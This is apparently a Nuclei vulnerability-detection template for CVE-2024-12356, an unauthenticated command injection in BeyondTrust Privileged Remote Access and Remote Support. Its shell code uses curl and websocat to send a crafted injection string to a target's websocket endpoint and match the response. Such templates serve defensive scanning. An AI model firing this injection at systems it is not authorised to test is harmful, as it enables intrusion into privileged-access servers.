id: CVE-2024-12356

info:
  name: Privileged Remote Access & Remote Support - Command Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user.
  remediation: |
    Apply the security patches provided by BeyondTrust for Privileged Remote Access and Remote Support products and restrict network access to trusted sources.
  impact: |
    Attackers can execute arbitrary commands as a site user, potentially leading to full system compromise or data breach.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12356
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-12356
    cwe-id: CWE-77
    epss-score: 0.93857
    epss-percentile: 0.99875
    cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:*
  metadata:
    vendor: beyondtrust
    product: privileged_remote_access
    verified: true
  tags: cve,cve2024,beyondtrust,rce,remote-support,privileged-remote-access,kev,vkev,vuln

code:
  - engine:
      - sh
      - bash
    source: |
      # brew install websocat
      company=`curl -k -s "$Scheme://$Host/get_portal_info" | cut -d '=' -f2 | tail -n 1 | cut -d';' -f1`
      echo -ne "1\n\n0\n\xC0';select 1 -- -\n" | websocat -k wss://$Host/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: $company" --binary -n --max-messages-rev 2

    matchers:
      - type: word
        part: response
        words:
          - "0 success"
          - "1 try again later"
# digest: 4a0a0047304502200602ef3c69a760758588ca696ed985dfa8918e8b140e08e837b1a18c6c8d6b3e022100f25b94c8a980ec684465bc0a6dc10a6ee283bd7c88fbbe273912ec0eab00d9c7:922c64590222798bb761d5b6d8e72950